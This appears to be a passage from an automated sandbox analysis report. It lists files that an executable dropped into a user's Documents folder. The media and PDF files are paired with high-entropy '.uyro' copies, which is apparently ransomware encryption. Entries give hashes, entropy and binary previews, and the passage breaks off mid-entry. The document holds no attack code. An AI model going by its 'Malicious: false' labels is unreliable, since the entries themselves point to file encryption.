SHA-512:	1F77A1941DB0DE3E032A1B3200ADCD1568BD15D6AA6BEA3ADB41C2D99A3728E2E7C26CFE80E6F849528AC0CF560E21EDAA5D0E881258C42DB513D17C93AA0FEC
Malicious:	false
Reputation:	unknown
Preview:	QNCYC_....z.}..(.....{t.....N...{...).....xSu..y.B..d9#.LI......~kq..x.....I..`%-.mN..@...?.M!>.5..+...;"...l..zIp.,9.".(..h.l5.O..A..H...Z....{.\|{u7.@.z....IH<"...wl...X..j......xW....$a;,'(.4..`.\|5PYz2.T..J..0.&..c].Uc.oM.C..)5~ot...u.w.....l....L..T.].......3.a..T6P.-'.G..7:..h..\|.d...y..FN.....g.s.g...`.1^\|...Eg..H.^D..Z9.0F...x.e<.}..x.........?.T.j...B-....".G.a.33..0...>.8!t\|.....R..P......6L.)m...%A.$.O...Z....:#.(.u.....6.ZR:...M...W7.....7.......Qr.....a;_^........P....+...G.........8.8../....<..sw......W.@..(........ r....m..n...i...1.H.....k...\|.......y...t. }..qJ.`.}.Uv.s.6....lU....U..z.9.nrk._~.w<.f0T.:.A\|CX.W.m..#.}.....c....JHY.....m..m.........?.}..RP&V....,..r`..E.(....}p.....3.....j.t._.....`vv..<.~.Wc.."......(kw>.=.GU...I.\./.J.t....E..q...<....1.Q..3...... .....>*..2/.n...m.0....".f..pd..a..Hr.<d>.y.......)..)....T.:.....of...9...0..x.;c.m...3......7...xw.?.&].^......w..b.A.....]...b.{qH{^.V.\|..x$..;.._.-L....\.`..3..

C:\Users\user\Documents\QNCYCDFIJJ.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846691353210032
Encrypted:	false
SSDEEP:	24:alO8/PcWq0ccD3qO5xeCEuSGAHq3T4oBVinjlZCp1SR1XajybD:aA88Wq7crS3HqqlSiogD
MD5:	7A075BADBF20B62F5DBC0A7BE96D7765
SHA1:	4B84E4B5EA5F46A1A1C8B5893368C14A7F38D292
SHA-256:	1660F21C163B69C140C213201C4C9D7F3E94FF8BAD42BBECFEE79A740DCF353C
SHA-512:	1F77A1941DB0DE3E032A1B3200ADCD1568BD15D6AA6BEA3ADB41C2D99A3728E2E7C26CFE80E6F849528AC0CF560E21EDAA5D0E881258C42DB513D17C93AA0FEC
Malicious:	false
Reputation:	unknown
Preview:	QNCYC_....z.}..(.....{t.....N...{...).....xSu..y.B..d9#.LI......~kq..x.....I..`%-.mN..@...?.M!>.5..+...;"...l..zIp.,9.".(..h.l5.O..A..H...Z....{.\|{u7.@.z....IH<"...wl...X..j......xW....$a;,'(.4..`.\|5PYz2.T..J..0.&..c].Uc.oM.C..)5~ot...u.w.....l....L..T.].......3.a..T6P.-'.G..7:..h..\|.d...y..FN.....g.s.g...`.1^\|...Eg..H.^D..Z9.0F...x.e<.}..x.........?.T.j...B-....".G.a.33..0...>.8!t\|.....R..P......6L.)m...%A.$.O...Z....:#.(.u.....6.ZR:...M...W7.....7.......Qr.....a;_^........P....+...G.........8.8../....<..sw......W.@..(........ r....m..n...i...1.H.....k...\|.......y...t. }..qJ.`.}.Uv.s.6....lU....U..z.9.nrk._~.w<.f0T.:.A\|CX.W.m..#.}.....c....JHY.....m..m.........?.}..RP&V....,..r`..E.(....}p.....3.....j.t._.....`vv..<.~.Wc.."......(kw>.=.GU...I.\./.J.t....E..q...<....1.Q..3...... .....>*..2/.n...m.0....".f..pd..a..Hr.<d>.y.......)..)....T.:.....of...9...0..x.;c.m...3......7...xw.?.&].^......w..b.A.....]...b.{qH{^.V.\|..x$..;.._.-L....\.`..3..

C:\Users\user\Documents\RAYHIWGKDI.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.800222568398838
Encrypted:	false
SSDEEP:	24:EGjQPjhHbFWSyczndCUspLLd7XOQOo1NQSPdTBWa89BVvRILw/LiJD6+MbD:ERdHbFNDMrV7eQ5eOTBWa2VvRsJD5GD
MD5:	555AC44EF76BEB85EE8DCC27717FCA4D
SHA1:	62CBA65A4F65F49EEA635A0FFC4E6E2549359775
SHA-256:	9D908384BE3243697816FD8916C21C4D1A082AF3856AD93F318B2F6B9ABE9297
SHA-512:	4FF4F42BBB31B958097693CDB1CF47B561B56730EDBD6A13CB868A421D1E033E7744B45E7E29E20FD23274E6BFD6E9BE22E914AEF0B8313F05A5ECD821969966
Malicious:	false
Reputation:	unknown
Preview:	RAYHI.....==.Hv.....J.y$._.0p..E.G..G..Dj..K)._.PH.N..... }..5.+2...f.c..uBC.LC....YT-.X.Y.\|..@1.C.e.`.).=lO.Q..Uk@q..{..\..4d..E.+.8...)P>...Z (.....9..U.+d.$f...h....._....j..1..4...ar....bk...E&.YMr....&z...>.h....p.......\O.LA.>[y.$P..R<_iV.&\|.9...:(7.a>..Y...)._9.J.ry.Z....kgX.2e.....o.mv.E.e.k1......zT.r....K...<..~.....4.e.e....O....(..wL.Y/.s...Bq....3..U.......Y.......@.k....T.5...w..`.P.B?..0.U..kFA...."c...B......L...)C).L....Da.`.=........5.t...%@..1l[......U5F.+v....i...V[.EF.....t.e c4{.....-.i...1$.R..,....S.vs=....-.5. :H./..Cz....=..y.DB.....5m.Es..}.v.)s.d.........o=;.Ry.X.... c...s.....Au.@.L..$..X\|..`.(.....,...=.cxT../.7df[%....h..O..{.x.........K...b.....2h8..x..8..^.....?..(,6xE...A..w.p......S..:..r...2.[e..u`..(......_[i._...?..e Q.f..K......]4.'.}&....C.J..d,.K...._.......]5w....9.w.....&.B..,h.O.....W..x..cF......3.7df......4b......e.3....i.T.Vi.....#....sXc..`u..G....5.+.2..-7.>.-.i.].L.W.q.w...Be....mW.u..a...\|

C:\Users\user\Documents\RAYHIWGKDI.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.800222568398838
Encrypted:	false
SSDEEP:	24:EGjQPjhHbFWSyczndCUspLLd7XOQOo1NQSPdTBWa89BVvRILw/LiJD6+MbD:ERdHbFNDMrV7eQ5eOTBWa2VvRsJD5GD
MD5:	555AC44EF76BEB85EE8DCC27717FCA4D
SHA1:	62CBA65A4F65F49EEA635A0FFC4E6E2549359775
SHA-256:	9D908384BE3243697816FD8916C21C4D1A082AF3856AD93F318B2F6B9ABE9297
SHA-512:	4FF4F42BBB31B958097693CDB1CF47B561B56730EDBD6A13CB868A421D1E033E7744B45E7E29E20FD23274E6BFD6E9BE22E914AEF0B8313F05A5ECD821969966
Malicious:	false
Reputation:	unknown
Preview:	RAYHI.....==.Hv.....J.y$._.0p..E.G..G..Dj..K)._.PH.N..... }..5.+2...f.c..uBC.LC....YT-.X.Y.\|..@1.C.e.`.).=lO.Q..Uk@q..{..\..4d..E.+.8...)P>...Z (.....9..U.+d.$f...h....._....j..1..4...ar....bk...E&.YMr....&z...>.h....p.......\O.LA.>[y.$P..R<_iV.&\|.9...:(7.a>..Y...)._9.J.ry.Z....kgX.2e.....o.mv.E.e.k1......zT.r....K...<..~.....4.e.e....O....(..wL.Y/.s...Bq....3..U.......Y.......@.k....T.5...w..`.P.B?..0.U..kFA...."c...B......L...)C).L....Da.`.=........5.t...%@..1l[......U5F.+v....i...V[.EF.....t.e c4{.....-.i...1$.R..,....S.vs=....-.5. :H./..Cz....=..y.DB.....5m.Es..}.v.)s.d.........o=;.Ry.X.... c...s.....Au.@.L..$..X\|..`.(.....,...=.cxT../.7df[%....h..O..{.x.........K...b.....2h8..x..8..^.....?..(,6xE...A..w.p......S..:..r...2.[e..u`..(......_[i._...?..e Q.f..K......]4.'.}&....C.J..d,.K...._.......]5w....9.w.....&.B..,h.O.....W..x..cF......3.7df......4b......e.3....i.T.Vi.....#....sXc..`u..G....5.+.2..-7.>.-.i.].L.W.q.w...Be....mW.u..a...\|

C:\Users\user\Documents\SFPUSAFIOL.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.88481678721523
Encrypted:	false
SSDEEP:	24:mbWUH1C6TAm8Irhb/L9ITBAfRvCnSzrmN5fe5dNE25MtMe6B+9POkNJJFMWsicaT:mbdH8wphb/LQB8RaSzqC5dv5DBY2klFV
MD5:	90386FB8345A9F273E40308BB166A5E4
SHA1:	1CE70180010E25D4F4D647DC031E5B40D36846FD
SHA-256:	C1BCEA12289B992A28F62CDA0A19F785A5A3C2F4E8D44D97F6995E5D2F5735A5
SHA-512:	7040294133DBE50D7011CE9E22E9C736DB47DEC85BE8966EC6247012B8D598490412D2B9FBF45991E85176C304F53A1F86FFF626BF29278192E5A843431283E0
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.x....}..Kq.....S!#..D..Eb..P6.:S..D...Q..'.?.Sd.y.?..\..u.>.lN..9e.....b..J....R.8}~R.....f..S.d$.V......X{'....$9%.`M'..7............_..vY.H...w...t..>C..z.>~+}...c.V.-.V..V..B......].6.....=.k^.h..t....)j>&l...O.U.+....8...=.;.gP..%f..j%!Zjv.%N-.....T...jfYhuM.......d.>5/T.....,.G+\.4Z..e...s....f.5D...+[r..+...nY...!..Z5C..n'{.]....}?kH...........C.~..#$.'....o..d...&.......1..........W.G..N...[I.......gjZ.#.hY.]..$..I..OP..RAU.\.`..H.7._h:3......\. ..Lxf.....dA.....2w.&....D.WL..#!.r,....^..` ...^.Tp... h8.g....L.p?...<..{.S...]..%K............2x.......-.."..5....~.p..!~Q,..<J?\......vz....0.o.z..$......@.@..U..qM1....~X.!....a2.}.Q...?....^.+h...T.s..-./O6..Mk...:...x.....O......D...2...0(......s.3.:.K3C"..D\.d. ..L^>......lB!....`../.l$.d.2<..Z...t.}..E..=..6j._.m..@....Yr..V...MG.D:...E..+q...@8.V4).... .....i..#.K. >..!.$.1..H.....Y...y..........WZk..I....`..A..&...I..H.........Q'._.1.< A..o...o.6...~..<rS5?.......*?.k&.c..E.>.T

C:\Users\user\Documents\SFPUSAFIOL.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.88481678721523
Encrypted:	false
SSDEEP:	24:mbWUH1C6TAm8Irhb/L9ITBAfRvCnSzrmN5fe5dNE25MtMe6B+9POkNJJFMWsicaT:mbdH8wphb/LQB8RaSzqC5dv5DBY2klFV
MD5:	90386FB8345A9F273E40308BB166A5E4
SHA1:	1CE70180010E25D4F4D647DC031E5B40D36846FD
SHA-256:	C1BCEA12289B992A28F62CDA0A19F785A5A3C2F4E8D44D97F6995E5D2F5735A5
SHA-512:	7040294133DBE50D7011CE9E22E9C736DB47DEC85BE8966EC6247012B8D598490412D2B9FBF45991E85176C304F53A1F86FFF626BF29278192E5A843431283E0
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.x....}..Kq.....S!#..D..Eb..P6.:S..D...Q..'.?.Sd.y.?..\..u.>.lN..9e.....b..J....R.8}~R.....f..S.d$.V......X{'....$9%.`M'..7............_..vY.H...w...t..>C..z.>~+}...c.V.-.V..V..B......].6.....=.k^.h..t....)j>&l...O.U.+....8...=.;.gP..%f..j%!Zjv.%N-.....T...jfYhuM.......d.>5/T.....,.G+\.4Z..e...s....f.5D...+[r..+...nY...!..Z5C..n'{.]....}?kH...........C.~..#$.'....o..d...&.......1..........W.G..N...[I.......gjZ.#.hY.]..$..I..OP..RAU.\.`..H.7._h:3......\. ..Lxf.....dA.....2w.&....D.WL..#!.r,....^..` ...^.Tp... h8.g....L.p?...<..{.S...]..%K............2x.......-.."..5....~.p..!~Q,..<J?\......vz....0.o.z..$......@.@..U..qM1....~X.!....a2.}.Q...?....^.+h...T.s..-./O6..Mk...:...x.....O......D...2...0(......s.3.:.K3C"..D\.d. ..L^>......lB!....`../.l$.d.2<..Z...t.}..E..=..6j._.m..@....Yr..V...MG.D:...E..+q...@8.V4).... .....i..#.K. >..!.$.1..H.....Y...y..........WZk..I....`..A..&...I..H.........Q'._.1.< A..o...o.6...~..<rS5?.......*?.k&.c..E.>.T

C:\Users\user\Documents\SQRKHNBNYN.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837761681407906
Encrypted:	false
SSDEEP:	24:80mNxjBM80EzL3YHwJx0kDWYb5Il6F6gg4O9U9QV9iOCxhGNEJqMl6WbD:80mTBM2ftJRWYby8FRghm9S9bCXmWhD
MD5:	EA66A6805F4F5E6C5C2B94BCB1502CBE
SHA1:	D0E8843BA6AA974FA9792451843319AEAA8CA87A
SHA-256:	456FE5A42D26119A46B30A6F9026100797B26D38AF7A1B163D66C08001234D00
SHA-512:	CE0CAFC1D658EB6970C812FCFD2620251408D5585BFCCF4C8262885AE4B8F82FFB931F942414ED7239560B62F851781C4CDC4304E09A9B581AE3D1219E5DD780
Malicious:	false
Reputation:	unknown
Preview:	SQRKH..X>8\|......L..l.........R.R.A>L.1,)..Z.8.U)..[.z....q.O3X.>...$..Z.R...I.\|.......cJ..n.u....I..~.......W.\S....A......@.........l"..Gl..Rf'f.l\D.-..H..j.......`}..N...feY.......T..lC.N.g...2.n0.j..?.......]z.).:.6..8cC.J.......,U.k..(...;......L.V5u.V.aM.,..F%s.Ztfd'~:c...g..r..+3.A.@V.].C....N....S9><.i...%..`..7.0...NT' ...\|.."...:K.'K......=&x.Z......L.....\|..v..8..".f......Z&%}...&.y......K....._N..\|.u.P.q.O}..q.K.~...KV./^.kt.....{k(7".c..Rn.)....L.k}..v.`......7..Qw....M.R..(...H..EJ-...?Z....J.....:g'H.'J..RR......s.zbQ......Zl.-...~..y4....}@..j1.:J-.w2coS......JcF.....9...C....J.%z.\..3.....q.e...0l...?.y...%...S.)]ag.M.T..L.DB._7.Q.........j.\|....T.k5./H..<1..Qd?..EQ.B...U..".S.......bw5.k....C.....~..w..f........A....F.N...Eb+.}..^E.gcB....w..e.....Sp....FD...j....0....3.;.x(..p..mX..E.J.l%t..@.d..2VU......B!.~..R;v..a..F.,....0l.W...f.dA.nEg".+...L.b.?....,.*\..84]^..y.7...wO...F.0......RY..Ve.M..

C:\Users\user\Documents\SQRKHNBNYN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837761681407906
Encrypted:	false
SSDEEP:	24:80mNxjBM80EzL3YHwJx0kDWYb5Il6F6gg4O9U9QV9iOCxhGNEJqMl6WbD:80mTBM2ftJRWYby8FRghm9S9bCXmWhD
MD5:	EA66A6805F4F5E6C5C2B94BCB1502CBE
SHA1:	D0E8843BA6AA974FA9792451843319AEAA8CA87A
SHA-256:	456FE5A42D26119A46B30A6F9026100797B26D38AF7A1B163D66C08001234D00
SHA-512:	CE0CAFC1D658EB6970C812FCFD2620251408D5585BFCCF4C8262885AE4B8F82FFB931F942414ED7239560B62F851781C4CDC4304E09A9B581AE3D1219E5DD780
Malicious:	false
Reputation:	unknown
Preview:	SQRKH..X>8\|......L..l.........R.R.A>L.1,)..Z.8.U)..[.z....q.O3X.>...$..Z.R...I.\|.......cJ..n.u....I..~.......W.\S....A......@.........l"..Gl..Rf'f.l\D.-..H..j.......`}..N...feY.......T..lC.N.g...2.n0.j..?.......]z.).:.6..8cC.J.......,U.k..(...;......L.V5u.V.aM.,..F%s.Ztfd'~:c...g..r..+3.A.@V.].C....N....S9><.i...%..`..7.0...NT' ...\|.."...:K.'K......=&x.Z......L.....\|..v..8..".f......Z&%}...&.y......K....._N..\|.u.P.q.O}..q.K.~...KV./^.kt.....{k(7".c..Rn.)....L.k}..v.`......7..Qw....M.R..(...H..EJ-...?Z....J.....:g'H.'J..RR......s.zbQ......Zl.-...~..y4....}@..j1.:J-.w2coS......JcF.....9...C....J.%z.\..3.....q.e...0l...?.y...%...S.)]ag.M.T..L.DB._7.Q.........j.\|....T.k5./H..<1..Qd?..EQ.B...U..".S.......bw5.k....C.....~..w..f........A....F.N...Eb+.}..^E.gcB....w..e.....Sp....FD...j....0....3.;.x(..p..mX..E.J.l%t..@.d..2VU......B!.~..R;v..a..F.,....0l.W...f.dA.nEg".+...L.b.?....,.*\..84]^..y.7...wO...F.0......RY..Ve.M..

C:\Users\user\Documents\UOOJJOZIRH.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837938474460221
Encrypted:	false
SSDEEP:	24:nKW2keFzSZl7Iqaer9gwg44EDaWFe84jWTC/KQkcT+eW25MDmJDwjybD:nF3Iw9VYpqT2Jkc6z0QmJDwMD
MD5:	9546F03551FB9133649FBCB54901BA6C
SHA1:	BE68EE377C971C83E692144FFDE97445189BC07A
SHA-256:	5303331B443E73D62019F39F34DB47E9097078ED4B53B9015611B70CFC350DC0
SHA-512:	ED2C8C9960AA4855C823E47ACF589176C05BC56C4E2EA42800480BE6C01DB6312C50CB205FA3F4F656BE6A386F982A83A901FD04FF09234199976F4FE30C77E1
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ.2Z...h..;...>..f......f.%..>..8......<<.1..gu3.....o\P...!.a....3).w.D......;5..v.w..M.Nz@.....W.r...H.W.......<#pn..%......L.Cs$\|N.P.....H...;.pp..j%d....hchc..-..5<..Z/..D5E...Yx....\|CB..\|f.....,......`...k1x..u.EXn.h.C.dEM..t.'...>....!.t..<I.C.\...#jAY......$...N.....}Y./....$.%.......ZgG.$.$...@.8.......}L....../2..I../..M6...bc...R....]R..H@.9N..z.L.......l{.a....7U....l.X.Z...._....=&.}..>..%e.....FfA.8..E.)...\.b..w.V...>.b6...s=...cB..9..`.S...!O&..=.....4}.w.D.I.HI.......$..rp.w.pc.y.HqX26l..ii...6.p..LMTG.V,g.G..T3..].G.y.k....#.aw..m..................P8....}&A.[..iU....A...W...)...T(}.s...=A.............Q.cLd/.G..........g.....f..fd.J!.d\|&...'..?.o...e.`-q...O..D........3....6.#r.......L=...CWQoz..5.C....d..}...nO.......[%..4.%.!..O[..0E..B.z.....PP..............<...m.....=....c.+.. 5s'.x.....G...@w.2...2w.9_.#9s6.+.A!..$...5....wh..].....>..t.C....i...B......P..-.:.f._.?-......4XY..n.(..7*(..r+......P. .I....c.m.

C:\Users\user\Documents\UOOJJOZIRH.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837938474460221
Encrypted:	false
SSDEEP:	24:nKW2keFzSZl7Iqaer9gwg44EDaWFe84jWTC/KQkcT+eW25MDmJDwjybD:nF3Iw9VYpqT2Jkc6z0QmJDwMD
MD5:	9546F03551FB9133649FBCB54901BA6C
SHA1:	BE68EE377C971C83E692144FFDE97445189BC07A
SHA-256:	5303331B443E73D62019F39F34DB47E9097078ED4B53B9015611B70CFC350DC0
SHA-512:	ED2C8C9960AA4855C823E47ACF589176C05BC56C4E2EA42800480BE6C01DB6312C50CB205FA3F4F656BE6A386F982A83A901FD04FF09234199976F4FE30C77E1
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ.2Z...h..;...>..f......f.%..>..8......<<.1..gu3.....o\P...!.a....3).w.D......;5..v.w..M.Nz@.....W.r...H.W.......<#pn..%......L.Cs$\|N.P.....H...;.pp..j%d....hchc..-..5<..Z/..D5E...Yx....\|CB..\|f.....,......`...k1x..u.EXn.h.C.dEM..t.'...>....!.t..<I.C.\...#jAY......$...N.....}Y./....$.%.......ZgG.$.$...@.8.......}L....../2..I../..M6...bc...R....]R..H@.9N..z.L.......l{.a....7U....l.X.Z...._....=&.}..>..%e.....FfA.8..E.)...\.b..w.V...>.b6...s=...cB..9..`.S...!O&..=.....4}.w.D.I.HI.......$..rp.w.pc.y.HqX26l..ii...6.p..LMTG.V,g.G..T3..].G.y.k....#.aw..m..................P8....}&A.[..iU....A...W...)...T(}.s...=A.............Q.cLd/.G..........g.....f..fd.J!.d\|&...'..?.o...e.`-q...O..D........3....6.#r.......L=...CWQoz..5.C....d..}...nO.......[%..4.%.!..O[..0E..B.z.....PP..............<...m.....=....c.+.. 5s'.x.....G...@w.2...2w.9_.#9s6.+.A!..$...5....wh..].....>..t.C....i...B......P..-.:.f._.?-......4XY..n.(..7*(..r+......P. .I....c.m.

C:\Users\user\Documents\WKXEWIOTXI.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868531165554377
Encrypted:	false
SSDEEP:	24:SYjZI1b+UrJfJvz/HB3XW1eAg2CzIgJBSy/FLLy3C340ifKq6rGuw1mLbD:1ZtyzvTHBWsA9CRJ5d0C3ZqgGuTD
MD5:	9F9DB4E450A5704271C05D54B208E503
SHA1:	11CD2AA08BD446057BE7AAFAD12F603F81F9FC18
SHA-256:	8FA379136B77735C0211A31A1302BE4F42EF891FC57923F2CB52486FEC3F433D
SHA-512:	E7579FFB8C38A16040C58011BA9ED97BB4DD958A7FF84E1991DE96C55A5D46210A9583E39941FE0543D455D9206DEC9EF7636425CE8257285AAEFB387AA4A007
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.a...E...[...P:.g.R...f.U.'.h=@.\.f....a..p.5.uz{.....W..h..+.!b.Z......3. ...I.$..G...c..-.y........y.gV.Zx.1.DH.X.V.0).......9......B....u.....m./<..W...u.h.i.J.4U<\....].J....e.....d~..7u_...L.9.#.B....A.n.b.....r.v..<\|....(.b.."s`.....W.m...\|.....j.. ...,D..m..W.?.k.9..3..k.V9P.C.0Z..C@'.kIm.G2..8t..].dv....cXC.......z.4,...bf..._kN..\|x...-...g..1.}.....GT9K....Z...c[U.R...v!.....H.N..#.._B..E8o.Pt....B.j...[y....1.35...j.8..c.#Z0..7.....3nf....d....sF.......FJ.M...?.v...T...0p..m.\yV...x.F.X&%.....R.Q.5./....om...Ck.\|[...+...Fc...z......%=..;C./..c..Zd...\u.I?f;.....[7O....8..~.H..%.(...#....PUC..e.-....5)......2..Ly8T.&.+.A.....E......n95)>.^2....@..6.G.b...!....."@..&.-.w<..#....G~.}...M./$1.K.7.M....J?.q.\.2+................`.dO..j.Ox...5u.w._~......k.......g.#.%..Je.Y......._.4`.......HB...........0..Vd6.A..V.Jhc.......~....S..bH.s4s._R.O.0s......Up.C.u....((........`....r.. ..c.7.\...h..Y..4.J#X.Xj.{i.$r../.I...R..sD.

C:\Users\user\Documents\WKXEWIOTXI.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868531165554377
Encrypted:	false
SSDEEP:	24:SYjZI1b+UrJfJvz/HB3XW1eAg2CzIgJBSy/FLLy3C340ifKq6rGuw1mLbD:1ZtyzvTHBWsA9CRJ5d0C3ZqgGuTD
MD5:	9F9DB4E450A5704271C05D54B208E503
SHA1:	11CD2AA08BD446057BE7AAFAD12F603F81F9FC18
SHA-256:	8FA379136B77735C0211A31A1302BE4F42EF891FC57923F2CB52486FEC3F433D
SHA-512:	E7579FFB8C38A16040C58011BA9ED97BB4DD958A7FF84E1991DE96C55A5D46210A9583E39941FE0543D455D9206DEC9EF7636425CE8257285AAEFB387AA4A007
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.a...E...[...P:.g.R...f.U.'.h=@.\.f....a..p.5.uz{.....W..h..+.!b.Z......3. ...I.$..G...c..-.y........y.gV.Zx.1.DH.X.V.0).......9......B....u.....m./<..W...u.h.i.J.4U<\....].J....e.....d~..7u_...L.9.#.B....A.n.b.....r.v..<\|....(.b.."s`.....W.m...\|.....j.. ...,D..m..W.?.k.9..3..k.V9P.C.0Z..C@'.kIm.G2..8t..].dv....cXC.......z.4,...bf..._kN..\|x...-...g..1.}.....GT9K....Z...c[U.R...v!.....H.N..#.._B..E8o.Pt....B.j...[y....1.35...j.8..c.#Z0..7.....3nf....d....sF.......FJ.M...?.v...T...0p..m.\yV...x.F.X&%.....R.Q.5./....om...Ck.\|[...+...Fc...z......%=..;C./..c..Zd...\u.I?f;.....[7O....8..~.H..%.(...#....PUC..e.-....5)......2..Ly8T.&.+.A.....E......n95)>.^2....@..6.G.b...!....."@..&.-.w<..#....G~.}...M./$1.K.7.M....J?.q.\.2+................`.dO..j.Ox...5u.w._~......k.......g.#.%..Je.Y......._.4`.......HB...........0..Vd6.A..V.Jhc.......~....S..bH.s4s._R.O.0s......Up.C.u....((........`....r.. ..c.7.\...h..Y..4.J#X.Xj.{i.$r../.I...R..sD.

C:\Users\user\Documents\WKXEWIOTXI.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85313128120834
Encrypted:	false
SSDEEP:	24:AxqX3RviOczTJXU6xZgenTKqLtuKtRDHcu1pqd2WzruMxEIR1ON2P7Vp4Zthpe2v:fXFiHzlD3TT/tuKtl8uY2Grgw1Oa7kZB
MD5:	222EECFCE70FC612EDEA54B3764A9A47
SHA1:	176E926BBCABAD3C486195B51F7243B3FBF0997B
SHA-256:	A381771E14E56E207E9325E4335B942253D525E990078C454123E213B3B5DD25
SHA-512:	082A5FB1B5E42E21CEF90298F1A1A84E6A49279F0BB911BDA9BA23D21AC0F291F1BC8EFB0607DE6002F97DB4FD9A22C1E1368FF491E45A731227BA741B3491A7
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.J.. ......#&..\|.~0..f.^...S....e...e..A...c....".Ud.`....d.G._.KP.I..r...,..5......XsY...g..-..E..z........'.5...p.1....6.\|H4.A...J.TT..f.'.....'.)..I.+.o...p..6.............j...2....V.:am.=.....Y...4jI.y.......I.d........\F...<.e...B.x+9.d.A....6....r)4...R... h`...-...WZ.......+X...h.....B..=...q<@.?I.S..=..u.....a.T8..\|......F.J....{l..(...#..C.....m..x....4"'..x.i..E.....i{GWL.^...0...N...o._I7vV..p9el....P...4....9.M...D....dyxj\d.50EX.G8...d6.....?........8.Z/.g...z{..0.B.G.....J.E..UZ(...%p.....a.Y.J...P.)..,.{1.....'.].}\d..l2B.?....s...N.<Z...2...O.Q...G.M.G.l@..<aI..G ....H{U.L...Ge.....;..8[.{..BHCw..,..>.~q.x.K.A9..........yO..)...U..Q......wx.I.k\|mK.1L..uq....k..Lb.\|.-.Sn&.L\|.6o.....^."..........R..v%..7...".$1....8.z...9R..'#.....hw.....}.Ok7....@...~J}$[&..p...9@h.%.qO^}....%...\q...)6......$'..@.......=O.T..^z.Ei.+.[U.o.t.^".C..n!J.7..V..DE.G.'?.......EQ.,Pc...1\|x.......#}X.....;..._n..a...Ve.L..^Y.5.u.0._]...P

C:\Users\user\Documents\WKXEWIOTXI.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85313128120834
Encrypted:	false
SSDEEP:	24:AxqX3RviOczTJXU6xZgenTKqLtuKtRDHcu1pqd2WzruMxEIR1ON2P7Vp4Zthpe2v:fXFiHzlD3TT/tuKtl8uY2Grgw1Oa7kZB
MD5:	222EECFCE70FC612EDEA54B3764A9A47
SHA1:	176E926BBCABAD3C486195B51F7243B3FBF0997B
SHA-256:	A381771E14E56E207E9325E4335B942253D525E990078C454123E213B3B5DD25
SHA-512:	082A5FB1B5E42E21CEF90298F1A1A84E6A49279F0BB911BDA9BA23D21AC0F291F1BC8EFB0607DE6002F97DB4FD9A22C1E1368FF491E45A731227BA741B3491A7
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.J.. ......#&..\|.~0..f.^...S....e...e..A...c....".Ud.`....d.G._.KP.I..r...,..5......XsY...g..-..E..z........'.5...p.1....6.\|H4.A...J.TT..f.'.....'.)..I.+.o...p..6.............j...2....V.:am.=.....Y...4jI.y.......I.d........\F...<.e...B.x+9.d.A....6....r)4...R... h`...-...WZ.......+X...h.....B..=...q<@.?I.S..=..u.....a.T8..\|......F.J....{l..(...#..C.....m..x....4"'..x.i..E.....i{GWL.^...0...N...o._I7vV..p9el....P...4....9.M...D....dyxj\d.50EX.G8...d6.....?........8.Z/.g...z{..0.B.G.....J.E..UZ(...%p.....a.Y.J...P.)..,.{1.....'.].}\d..l2B.?....s...N.<Z...2...O.Q...G.M.G.l@..<aI..G ....H{U.L...Ge.....;..8[.{..BHCw..,..>.~q.x.K.A9..........yO..)...U..Q......wx.I.k\|mK.1L..uq....k..Lb.\|.-.Sn&.L\|.6o.....^."..........R..v%..7...".$1....8.z...9R..'#.....hw.....}.Ok7....@...~J}$[&..p...9@h.%.qO^}....%...\q...)6......$'..@.......=O.T..^z.Ei.+.[U.o.t.^".C..n!J.7..V..DE.G.'?.......EQ.,Pc...1\|x.......#}X.....;..._n..a...Ve.L..^Y.5.u.0._]...P

C:\Users\user\Documents\WKXEWIOTXI.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839738798134914
Encrypted:	false
SSDEEP:	24:smC3sY6xLarZdIhnHJbQx+puIq5AYJ9Vg7TtD6dTL5zSf4J97k1nXgNAnsAVbD:z6OaQhHg+pI5AYDC7mZ+f4J1k1QapFD
MD5:	B3CE6F204A59F88439F994ACFC78A5B7
SHA1:	B7FFA0E2C27C860ADE471C88D2E789962F0E9420
SHA-256:	F4931A16A48E3495149BB84A8B19D14318820126BDC7E4894BF7321A2FB84C9B
